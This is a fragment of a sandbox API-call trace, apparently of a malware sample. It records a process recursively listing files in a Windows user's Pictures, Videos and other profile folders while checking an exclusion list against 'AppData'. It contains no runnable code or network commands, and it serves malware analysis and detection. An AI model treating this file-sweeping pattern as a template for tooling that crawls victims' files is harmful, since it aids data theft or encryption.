lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b4e0, ftCreationTime.dwHighDateTime=0x1d5b652, ftLastAccessTime.dwLowDateTime=0x33d385b0, ftLastAccessTime.dwHighDateTime=0x1d5b798, ftLastWriteTime.dwLowDateTime=0x33d385b0, ftLastWriteTime.dwHighDateTime=0x1d5b798, nFileSizeHigh=0x0, nFileSizeLow=0x138c5, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="EN4vTZXy-xQnxDkqMy.gif", cAlternateFileName="EN4VTZ~1.GIF")) returned 1 [0029.148] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fb7f40, ftCreationTime.dwHighDateTime=0x1d5b788, ftLastAccessTime.dwLowDateTime=0xf44f8ae0, ftLastAccessTime.dwHighDateTime=0x1d5b7a8, ftLastWriteTime.dwLowDateTime=0xf44f8ae0, ftLastWriteTime.dwHighDateTime=0x1d5b7a8, nFileSizeHigh=0x0, nFileSizeLow=0x17198, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="SF5U9BKNVl3bd-lE1Z7.gif", cAlternateFileName="SF5U9B~1.GIF")) returned 1 [0029.148] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4033360, ftCreationTime.dwHighDateTime=0x1d5b808, ftLastAccessTime.dwLowDateTime=0xfcd55950, ftLastAccessTime.dwHighDateTime=0x1d5c28f, ftLastWriteTime.dwLowDateTime=0xfcd55950, ftLastWriteTime.dwHighDateTime=0x1d5c28f, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9, dwReserved0=0x10, dwReserved1=0x777648, cFileName="T4n1IOAv.jpg", cAlternateFileName="")) returned 1 [0029.148] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77fd840, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6bebefd0, ftLastAccessTime.dwHighDateTime=0x1d5bcb3, ftLastWriteTime.dwLowDateTime=0x6bebefd0, ftLastWriteTime.dwHighDateTime=0x1d5bcb3, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="VyeRic.png", cAlternateFileName="")) returned 1 [0029.148] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x16c0046, ftCreationTime.dwLowDateTime=0x36c455, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1560047, nFileSizeHigh=0x36c455, nFileSizeLow=0x88a1c8, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Vy\x08", cAlternateFileName="Ἀ{jဓĩ\x10")) returned 0 [0029.148] FindClose (in: hFindFile=0x7c22c0 | out: hFindFile=0x7c22c0) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571a30f0, ftCreationTime.dwHighDateTime=0x1d5b590, ftLastAccessTime.dwLowDateTime=0x34056510, ftLastAccessTime.dwHighDateTime=0x1d5bd80, ftLastWriteTime.dwLowDateTime=0x34056510, ftLastWriteTime.dwHighDateTime=0x1d5bd80, nFileSizeHigh=0x0, nFileSizeLow=0x86d1, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="bBtYMjAXU4VQ024a.gif", cAlternateFileName="BBTYMJ~1.GIF")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee1130, ftCreationTime.dwHighDateTime=0x1d5c22e, ftLastAccessTime.dwLowDateTime=0xff7d9b90, ftLastAccessTime.dwHighDateTime=0x1d5bf92, ftLastWriteTime.dwLowDateTime=0xff7d9b90, ftLastWriteTime.dwHighDateTime=0x1d5bf92, nFileSizeHigh=0x0, nFileSizeLow=0xe4ad, dwReserved0=0x10, dwReserved1=0x777648, cFileName="D_O37vI.bmp", cAlternateFileName="")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67638aa0, ftCreationTime.dwHighDateTime=0x1d5b857, ftLastAccessTime.dwLowDateTime=0x1b168b00, ftLastAccessTime.dwHighDateTime=0x1d5b5e8, ftLastWriteTime.dwLowDateTime=0x1b168b00, ftLastWriteTime.dwHighDateTime=0x1d5b5e8, nFileSizeHigh=0x0, nFileSizeLow=0xc43c, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="HCAqLJKeYC.jpg", cAlternateFileName="HCAQLJ~1.JPG")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5ce710, ftCreationTime.dwHighDateTime=0x1d5b8a1, ftLastAccessTime.dwLowDateTime=0x499c4a70, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x499c4a70, ftLastWriteTime.dwHighDateTime=0x1d5c04a, nFileSizeHigh=0x0, nFileSizeLow=0x17d10, dwReserved0=0x10, dwReserved1=0x777648, cFileName="jmlqzsHsNYwroWx4C3m9.bmp", cAlternateFileName="JMLQZS~1.BMP")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c0c2be0, ftCreationTime.dwHighDateTime=0x1d5c23a, ftLastAccessTime.dwLowDateTime=0x6e36d7a0, ftLastAccessTime.dwHighDateTime=0x1d5c08c, ftLastWriteTime.dwLowDateTime=0x6e36d7a0, ftLastWriteTime.dwHighDateTime=0x1d5c08c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="xmQr1I0", cAlternateFileName="")) returned 1 [0029.149] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.149] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\*", lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c0c2be0, ftCreationTime.dwHighDateTime=0x1d5c23a, ftLastAccessTime.dwLowDateTime=0x6e36d7a0, ftLastAccessTime.dwHighDateTime=0x1d5c08c, ftLastWriteTime.dwLowDateTime=0x6e36d7a0, ftLastWriteTime.dwHighDateTime=0x1d5c08c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c22c0 [0029.149] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c0c2be0, ftCreationTime.dwHighDateTime=0x1d5c23a, ftLastAccessTime.dwLowDateTime=0x6e36d7a0, ftLastAccessTime.dwHighDateTime=0x1d5c08c, ftLastWriteTime.dwLowDateTime=0x6e36d7a0, ftLastWriteTime.dwHighDateTime=0x1d5c08c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ea0bb0, ftCreationTime.dwHighDateTime=0x1d5c145, ftLastAccessTime.dwLowDateTime=0x908cae0, ftLastAccessTime.dwHighDateTime=0x1d5c09c, ftLastWriteTime.dwLowDateTime=0x908cae0, ftLastWriteTime.dwHighDateTime=0x1d5c09c, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x4, dwReserved1=0x777648, cFileName="3Q41yk8hNSN8X6D.gif", cAlternateFileName="3Q41YK~1.GIF")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eea17e0, ftCreationTime.dwHighDateTime=0x1d5b6c3, ftLastAccessTime.dwLowDateTime=0xa7b7e2d0, ftLastAccessTime.dwHighDateTime=0x1d5b90c, ftLastWriteTime.dwLowDateTime=0xa7b7e2d0, ftLastWriteTime.dwHighDateTime=0x1d5b90c, nFileSizeHigh=0x0, nFileSizeLow=0x1010e, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="9REPn4aYX.bmp", cAlternateFileName="9REPN4~1.BMP")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab63280, ftCreationTime.dwHighDateTime=0x1d5bf24, ftLastAccessTime.dwLowDateTime=0x9c732570, ftLastAccessTime.dwHighDateTime=0x1d5b9ec, ftLastWriteTime.dwLowDateTime=0x9c732570, ftLastWriteTime.dwHighDateTime=0x1d5b9ec, nFileSizeHigh=0x0, nFileSizeLow=0xece8, dwReserved0=0x10, dwReserved1=0x777648, cFileName="dlVzwDk.bmp", cAlternateFileName="")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb975d470, ftCreationTime.dwHighDateTime=0x1d5b5db, ftLastAccessTime.dwLowDateTime=0x5d448bc0, ftLastAccessTime.dwHighDateTime=0x1d5c2ff, ftLastWriteTime.dwLowDateTime=0x5d448bc0, ftLastWriteTime.dwHighDateTime=0x1d5c2ff, nFileSizeHigh=0x0, nFileSizeLow=0x3a26, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="jn9U.jpg", cAlternateFileName="")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a011c0, ftCreationTime.dwHighDateTime=0x1d5b774, ftLastAccessTime.dwLowDateTime=0x10c4ba0, ftLastAccessTime.dwHighDateTime=0x1d5b921, ftLastWriteTime.dwLowDateTime=0x10c4ba0, ftLastWriteTime.dwHighDateTime=0x1d5b921, nFileSizeHigh=0x0, nFileSizeLow=0x56fe, dwReserved0=0x10, dwReserved1=0x777648, cFileName="jyNlG9.jpg", cAlternateFileName="")) returned 1 [0029.149] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x1560046, ftCreationTime.dwLowDateTime=0x36c4f9, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1620047, nFileSizeHigh=0x36c4f9, nFileSizeLow=0x23, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="?j\x08", cAlternateFileName="ᶠ{jဓĩ\x10")) returned 0 [0029.149] FindClose (in: hFindFile=0x7c22c0 | out: hFindFile=0x7c22c0) returned 1 [0029.157] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a30a60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x937c360, ftLastAccessTime.dwHighDateTime=0x1d5b686, ftLastWriteTime.dwLowDateTime=0x937c360, ftLastWriteTime.dwHighDateTime=0x1d5b686, nFileSizeHigh=0x0, nFileSizeLow=0x14480, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="zSK4r.jpg", cAlternateFileName="")) returned 1 [0029.157] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1060057, ftCreationTime.dwLowDateTime=0x36c51e, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x13c0058, nFileSizeHigh=0x36c51e, nFileSizeLow=0x889fe8, dwReserved0=0x10, dwReserved1=0x777648, cFileName="zS\x08", cAlternateFileName="᳘{jဓĩ\x10")) returned 0 [0029.157] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.157] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd411ac50, ftCreationTime.dwHighDateTime=0x1d5c012, ftLastAccessTime.dwLowDateTime=0x7e49c540, ftLastAccessTime.dwHighDateTime=0x1d5bd43, ftLastWriteTime.dwLowDateTime=0x7e49c540, ftLastWriteTime.dwHighDateTime=0x1d5bd43, nFileSizeHigh=0x0, nFileSizeLow=0x13ec2, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="phhv1rvP we R.gif", cAlternateFileName="PHHV1R~1.GIF")) returned 1 [0029.157] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc20e800, ftCreationTime.dwHighDateTime=0x1d5bc9d, ftLastAccessTime.dwLowDateTime=0xfedbce60, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xfedbce60, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0xbaf4, dwReserved0=0x10, dwReserved1=0x777648, cFileName="pIsPeGCNL7-FJt.png", cAlternateFileName="PISPEG~1.PNG")) returned 1 [0029.157] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3e07f0, ftCreationTime.dwHighDateTime=0x1d5c255, ftLastAccessTime.dwLowDateTime=0xd28ab6b0, ftLastAccessTime.dwHighDateTime=0x1d5c40e, ftLastWriteTime.dwLowDateTime=0xd28ab6b0, ftLastWriteTime.dwHighDateTime=0x1d5c40e, nFileSizeHigh=0x0, nFileSizeLow=0xc15, dwReserved0=0x10, dwReserved1=0x777648, cFileName="RyGEMqdNb-RYBEky Y-C.gif", cAlternateFileName="RYGEMQ~1.GIF")) returned 1 [0029.157] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.158] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PrintHood", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0029.158] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.158] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889e68, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9d7020c, nFileSizeHigh=0x33c801, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᨰ{jဓĩ\x10")) returned 0xffffffff [0029.158] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Recent", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0029.158] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.158] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889e20, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9d7020c, nFileSizeHigh=0x33c82b, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᨰ{jဓĩ\x10")) returned 0xffffffff [0029.158] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Saved Games", cchCount1=11, lpString2="AppData", cchCount2=7) returned 3 [0029.158] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.158] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0029.159] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.159] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0029.159] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.159] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Searches", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0029.159] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.159] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0029.159] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.159] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0029.159] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.159] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SendTo", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0029.159] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.159] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889e20, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9e0020c, nFileSizeHigh=0x33c8cb, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᩘ{jဓĩ\x10")) returned 0xffffffff [0029.160] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Start Menu", cchCount1=10, lpString2="AppData", cchCount2=7) returned 3 [0029.160] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889e68, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9e0020c, nFileSizeHigh=0x33c8f4, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᩘ{jဓĩ\x10")) returned 0xffffffff [0029.160] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Templates", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0029.160] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889e20, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9e0020c, nFileSizeHigh=0x33c91d, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᩘ{jဓĩ\x10")) returned 0xffffffff [0029.160] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0029.160] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f80a330, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f80a330, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0029.160] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f80a330, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f80a330, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.160] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b24390, ftCreationTime.dwHighDateTime=0x1d5b968, ftLastAccessTime.dwLowDateTime=0x8e9c0710, ftLastAccessTime.dwHighDateTime=0x1d5c585, ftLastWriteTime.dwLowDateTime=0x8e9c0710, ftLastWriteTime.dwHighDateTime=0x1d5c585, nFileSizeHigh=0x0, nFileSizeLow=0x14221, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="2hbnq.avi", cAlternateFileName="")) returned 1 [0029.160] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL", cchCount1=6, lpString2="AppData", cchCount2=7) returned 3 [0029.161] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6d2b20, ftCreationTime.dwHighDateTime=0x1d5be32, 